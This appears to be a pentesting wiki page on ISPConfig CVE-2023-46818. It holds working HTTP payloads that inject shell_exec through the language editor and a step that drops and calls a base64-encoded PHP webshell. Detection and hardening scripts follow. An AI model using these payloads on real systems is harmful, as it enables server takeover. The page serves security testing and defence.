ISPConfig

Overview

ISPConfig is an open-source hosting control panel. Older 3.2.x releases shipped a language-file editor which, when enabled for the superadmin, allowed arbitrary PHP code injection through a malformed translation record. This can yield RCE in the web server's context and, depending on how PHP is run, privilege escalation.

Default base paths:

  • The web root is often at /var/www/ispconfig when served with php -S or via Apache/nginx.
  • The admin UI is reachable on an HTTP(S) vhost (sometimes bound to localhost only; use an SSH port-forward if needed).

Note: if the panel is bound locally (e.g. 127.0.0.1:8080), set up a port-forward:

```bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
```

Language editor PHP code injection (CVE-2023-46818)

  • Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
  • Preconditions:
    • Logged in as the built-in superadmin account admin (other roles are not affected, according to the vendor)
    • The language editor must be enabled: admin_allow_langedit=yes in /usr/local/ispconfig/security/security_settings.ini
  • Impact: an authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, gaining RCE in the web context

References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

Manual exploitation flow

  1. Open/create a language file to obtain CSRF tokens

Send a first POST to initialise the form and parse the CSRF fields (csrf_id, csrf_key) out of the HTML response. Example request path: /admin/language_edit.php.

  2. Inject PHP via records[] and save

Submit a second POST including the CSRF fields and a translation record carrying the malicious content. Minimal command-execution probes:

```http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
```

Out-of-band test (watch for ICMP):

```http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
```

  3. Write files and drop a webshell

Use file_put_contents to create a file under a web-reachable path (for example, admin/):

```http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
```

Then write a simple webshell, base64-encoding it to avoid bad characters in the POST body:

```http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
```

Then call the webshell:

```bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
```

If PHP runs as root (for example via php -S 127.0.0.1:8080 started by root), this yields root RCE immediately. Otherwise you get code execution as the web server user.
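From the defender's side, the injection described in steps 2 and 3 leaves residue in the language files themselves. The following Python is an added example, not code from this page or from the ISPConfig project: it scans a language (.lng) file for a PHP open tag after the first line, for functions that never belong in a translation string, and for lines that do not fit the `$wb['key'] = 'value';` layout. That layout and the sample file content are assumptions constructed for the example; `scan_tree` applies the same check to every .lng file under a directory such as the web root named above.

```python
import re
from pathlib import Path

# Constructed sample of an ISPConfig language (.lng) file. The "$wb['key'] = 'value';"
# layout is an assumption about what the language editor writes; the last assignment is a
# constructed example of what the injection above would leave behind.
SAMPLE_LNG = """<?php
$wb['login_txt'] = 'Login';
$wb['logout_txt'] = 'Logout';
$wb['welcome_txt'] = 'Welcome to ISPConfig';
$wb['0'] = '<?php echo shell_exec("id"); ?>';
?>
"""

# A translation assignment: single-quoted value, backslash escapes allowed inside it.
_ASSIGNMENT = re.compile(
    r"^\$wb\[\s*'(?P<key>[^']*)'\s*\]\s*=\s*'(?P<val>(?:[^'\\]|\\.)*)'\s*;$")
# Everything else a clean file may contain: PHP open/close tag, blank lines, comments.
_BENIGN = re.compile(r"^(<\?php|\?>|//.*|#.*)?$")
# Functions that have no business inside a translation string.
_DANGEROUS = re.compile(
    r"\b(shell_exec|system|passthru|exec|popen|proc_open|eval|assert|base64_decode|"
    r"file_put_contents|file_get_contents|include|require)\s*\(", re.I)


def scan_language_file(text):
    """Return [(line_no, reason, line)] for anything that should not be in a .lng file."""
    findings = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        # A PHP open tag after the first line means code was injected, whether or not it
        # currently sits inside a string literal.
        if no > 1 and ("<?php" in line or "<?=" in line):
            findings.append((no, "php-open-tag-inside-file", line))
            continue
        m = _ASSIGNMENT.match(line)
        if m:
            if _DANGEROUS.search(m.group("val")):
                findings.append((no, "dangerous-function-in-translation", line))
            continue
        if _BENIGN.match(line):
            continue
        findings.append((no, "unexpected-line", line))
    return findings


def scan_tree(root):
    """Apply scan_language_file to every .lng file under root; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*.lng"):
        hits = scan_language_file(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


if __name__ == "__main__":
    import sys
    # Usage: python3 scan_lng.py /var/www/ispconfig   (web root named on the page)
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            for no, reason, line in hits:
                print(f"{path}:{no}: {reason}: {line}")
    else:
        for no, reason, line in scan_language_file(SAMPLE_LNG):
            print(f"sample.lng:{no}: {reason}: {line}")
```

The open-tag rule is deliberately blunt: a second `<?php` in a file that should be pure string assignments is worth a look even when the surrounding quoting would stop it from executing today, because it shows the editor accepted untrusted content unescaped. Pair the scan with a listing of recently created .php files under the web root (the page's example drops admin/shell.php), which this check does not cover.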

Python PoC

A ready-to-use exploit automates token handling and payload delivery:

Example run:

```bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
```

Hardening

  • Update to 3.2.11p1 or later
  • Disable the language editor unless it is strictly required:
    admin_allow_langedit=no
  • Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
  • Enforce strong authentication for the built-in admin account
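The two preconditions listed for CVE-2023-46818 (a release older than 3.2.11p1 and admin_allow_langedit=yes) and the first two hardening items above can be checked and applied mechanically. The script below is an added example and not part of this page or of ISPConfig: the version string is assumed to be supplied by the operator from the panel, the INI sample is constructed (the `[permissions]` section name is an assumption; the key and the file path are the page's), and `harden_ini` rewrites the key to no.

```python
import re

# Constructed sample of /usr/local/ispconfig/security/security_settings.ini (path from the
# page). The key is the page's; the section name is an assumption for the example.
SAMPLE_INI = """[permissions]
admin_allow_langedit=yes
"""

FIXED_VERSION = "3.2.11p1"  # first fixed release named in the advisory summary
LANGEDIT_KEY = "admin_allow_langedit"


def parse_version(v):
    """Map '3.2.11' or '3.2.11p1' to a comparable tuple; a missing pN suffix counts as p0."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised ISPConfig version: {v!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def _kv(line):
    """Split 'key=value' (ignoring blanks, comments and section headers); None otherwise."""
    s = line.strip()
    if not s or s[0] in ";#[":
        return None
    key, sep, val = s.partition("=")
    if not sep:
        return None
    return key.strip(), val.strip().strip("\"'")


def langedit_enabled(ini_text):
    """True when the last admin_allow_langedit line in the INI text says yes."""
    enabled = False
    for line in ini_text.splitlines():
        kv = _kv(line)
        if kv and kv[0] == LANGEDIT_KEY:
            enabled = kv[1].lower() == "yes"
    return enabled


def assess(version, ini_text):
    """Return {'findings': [...], 'exposed': bool}; exposed requires both conditions together."""
    findings = []
    old = parse_version(version) < parse_version(FIXED_VERSION)
    editor = langedit_enabled(ini_text)
    if old:
        findings.append(f"ISPConfig {version} predates {FIXED_VERSION}: update")
    if editor:
        findings.append(f"{LANGEDIT_KEY}=yes: disable the language editor unless it is required")
    return {"findings": findings, "exposed": old and editor}


def harden_ini(ini_text):
    """Return the INI text with admin_allow_langedit forced to no (appended if absent)."""
    out, seen = [], False
    for line in ini_text.splitlines():
        kv = _kv(line)
        if kv and kv[0] == LANGEDIT_KEY:
            out.append(f"{LANGEDIT_KEY}=no")
            seen = True
        else:
            out.append(line)
    if not seen:
        out.append(f"{LANGEDIT_KEY}=no")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    import sys
    # Usage: python3 audit_langedit.py <version> [path to security_settings.ini]
    ver = sys.argv[1] if len(sys.argv) > 1 else "3.2.11"
    ini = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_INI
    result = assess(ver, ini)
    for f in result["findings"]:
        print("FINDING:", f)
    print("exposed to CVE-2023-46818 preconditions:", result["exposed"])
```

The version parser treats the `pN` suffix as a fourth component so that 3.2.11 sorts below 3.2.11p1 while 3.2.12 sorts above it; a plain string comparison would get the first case wrong. Note that `exposed` only reflects the two preconditions on the page; the third hardening item (PHP not running as root) is a deployment property the INI file cannot tell you.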

References
